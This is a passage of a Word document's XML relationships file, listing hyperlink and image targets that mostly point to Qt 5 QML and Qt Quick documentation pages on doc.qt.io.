Target="http://doc.qt.io/qt-5/qml-qtquick-springanimation.html" TargetMode="External"/><Relationship Id="rId1513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId1720" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1958" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId1818" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qfiledialog.html" TargetMode="External"/><Relationship Id="rId3033" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qtcreator/images/qml-observer-view.png" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-loader.html" TargetMode="External"/><Relationship Id="rId2287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-intvalidator.html" TargetMode="External"/><Relationship Id="rId2494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertyanimation.html" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlpropertyvaluesource.html" TargetMode="External"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-uses-visual-opacity.png" TargetMode="External"/><Relationship Id="rId673" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-workerscript.html" TargetMode="External"/><Relationship Id="rId880" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-depthtest.html" TargetMode="External"/><Relationship Id="rId1096" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-mesh.html" TargetMode="External"/><Relationship Id="rId2147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterialshader.html" TargetMode="External"/><Relationship Id="rId2354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquicklayouts-index.html" TargetMode="External"/><Relationship Id="rId2561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2799" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-bool.html" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlextensionplugin.html" TargetMode="External"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId978" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-heightmapsurfacedataproxy.html" TargetMode="External"/><Relationship Id="rId1163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-pickingsettings.html" TargetMode="External"/><Relationship Id="rId1370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId2007" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qloggingcategory.html" TargetMode="External"/><Relationship Id="rId2214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2659" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-textfield.html" TargetMode="External"/><Relationship Id="rId2866" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId740" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtaudioengine-audiocategory.html" TargetMode="External"/><Relationship Id="rId838" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-coloroverlay.html" TargetMode="External"/><Relationship Id="rId1023" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-keyboarddevice.html" TargetMode="External"/><Relationship Id="rId1468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-wheelevent.html" TargetMode="External"/><Relationship Id="rId1675" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1882" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-rectangleshape.html" TargetMode="External"/><Relationship Id="rId2421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-stategroup.html" TargetMode="External"/><Relationship Id="rId2519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId2726" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-int.html" TargetMode="External"/><Relationship Id="rId600" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-displace.html" TargetMode="External"/><Relationship Id="rId1230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-rendercapture.html" TargetMode="External"/><Relationship Id="rId1328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-stenciloperation.html" TargetMode="External"/><Relationship Id="rId1535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId2933" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmetaobject.html" TargetMode="External"/><Relationship Id="rId905" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-dropshadow.html" TargetMode="External"/><Relationship Id="rId1742" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId1602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-cppintegration-definetypes.html" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/resources.html" TargetMode="External"/><Relationship Id="rId1907" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2071" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgclipnode.html" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId695" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-abstractaxis3d.html" TargetMode="External"/><Relationship Id="rId2169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-grid.html" TargetMode="External"/><Relationship Id="rId2583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2790" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-expressions.html" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-topic.html" TargetMode="External"/><Relationship Id="rId555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qapplication.html" TargetMode="External"/><Relationship Id="rId762" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtbluetooth-bluetoothservice.html" TargetMode="External"/><Relationship Id="rId1185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-pointlight.html" TargetMode="External"/><Relationship Id="rId1392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-tooltip.html" TargetMode="External"/><Relationship Id="rId2029" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-textureinsgnode-example.html" TargetMode="External"/><Relationship Id="rId2236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-behaviors.html" TargetMode="External"/><Relationship Id="rId2650" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols2-chattutorial-example.html" TargetMode="External"/><Relationship Id="rId2888" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickpainteditem.html" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId622" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId1045" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-lightreading.html" TargetMode="External"/><Relationship Id="rId1252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-row.html" TargetMode="External"/><Relationship Id="rId1697" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId2303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-numberanimation.html" TargetMode="External"/><Relationship Id="rId2748" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId2955" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-codingconventions.html" TargetMode="External"/><Relationship Id="rId927" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-flickable.html" TargetMode="External"/><Relationship Id="rId1112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtnfc-ndefurirecord.html" TargetMode="External"/><Relationship Id="rId1557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1764" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1971" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2608" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-models-stringlistmodel-example.html" TargetMode="External"/><Relationship Id="rId2815" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquicktextdocument.html" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-data.html" TargetMode="External"/><Relationship Id="rId1417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-url.html" TargetMode="External"/><Relationship Id="rId1624" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1831" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-effects-particles.html" TargetMode="External"/><Relationship Id="rId1929" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qttest-qmlmodule.html" TargetMode="External"/><Relationship Id="rId2093" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-behavior.html" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-effects-particles.html" TargetMode="External"/><Relationship Id="rId2160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId3004" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-internationalization.html" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-color.html" TargetMode="External"/><Relationship Id="rId784" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-camera.html" TargetMode="External"/><Relationship Id="rId991" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-imagemodel.html" TargetMode="External"/><Relationship Id="rId1067" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-mappinchevent.html" TargetMode="External"/><Relationship Id="rId2020" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qt.html" TargetMode="External"/><Relationship Id="rId2465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-animations.html" TargetMode="External"/><Relationship Id="rId2672" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId644" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-listmodel.html" TargetMode="External"/><Relationship Id="rId851" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-conicalgradient.html" TargetMode="External"/><Relationship Id="rId1274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-sensorglobal.html" TargetMode="External"/><Relationship Id="rId1481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId1579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-convenience-topic.html" TargetMode="External"/><Relationship Id="rId2118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId2325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId2977" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-effects-particles.html" TargetMode="External"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/whatsnew50.html" TargetMode="External"/><Relationship Id="rId711" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtpositioning-address.html" TargetMode="External"/><Relationship Id="rId949" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-gaussianblur.html" TargetMode="External"/><Relationship Id="rId1134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-pageindicator.html" TargetMode="External"/><Relationship Id="rId1341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-switch.html" TargetMode="External"/><Relationship Id="rId1786" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-colordialog.html" TargetMode="External"/><Relationship Id="rId1993" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterialtype.html" TargetMode="External"/><Relationship Id="rId2837" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgengine.html" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId809" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3duniformlocation.html" TargetMode="External"/><Relationship Id="rId1201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertychanges.html" TargetMode="External"/><Relationship Id="rId1439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-vpiemodelmapper.html" TargetMode="External"/><Relationship Id="rId1646" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1853" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-trailemitter.html" TargetMode="External"/><Relationship Id="rId2904" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcomponent.html" TargetMode="External"/><Relationship Id="rId1506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qml-qtqml2-qtobject.html" TargetMode="External"/><Relationship Id="rId1713" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1920" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-identifiedmodules.html" TargetMode="External"/><Relationship Id="rId2182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId3026" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-debug-mode.html" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId599" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-radialgradient.html" TargetMode="External"/><Relationship Id="rId2042" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-textureinsgnode-example.html" TargetMode="External"/><Relationship Id="rId2487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parallelanimation.html" TargetMode="External"/><Relationship Id="rId2694" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId666" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shadereffect.html" TargetMode="External"/><Relationship Id="rId873" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-date.html" TargetMode="External"/><Relationship Id="rId1089" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-menuitem.html" TargetMode="External"/><Relationship Id="rId1296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtaudioengine-soundinstance.html" TargetMode="External"/><Relationship Id="rId2347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId2999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/mobiledevelopment.html" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlextensionplugin.html" TargetMode="External"/><Relationship Id="rId526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-layouts-example.html" TargetMode="External"/><Relationship Id="rId1156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathview.html" TargetMode="External"/><Relationship Id="rId1363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-textarea.html" TargetMode="External"/><Relationship Id="rId2207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId2761" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2859" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId733" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-applicationwindowstyle.html" TargetMode="External"/><Relationship Id="rId940" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-frame.html" TargetMode="External"/><Relationship Id="rId1016" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwinextras-jumplist.html" TargetMode="External"/><Relationship Id="rId1570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId1668" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquicklayouts-index.html" TargetMode="External"/><Relationship Id="rId1875" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-emitter.html" TargetMode="External"/><Relationship Id="rId2414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-effects-sprites.html" TargetMode="External"/><Relationship Id="rId2621" 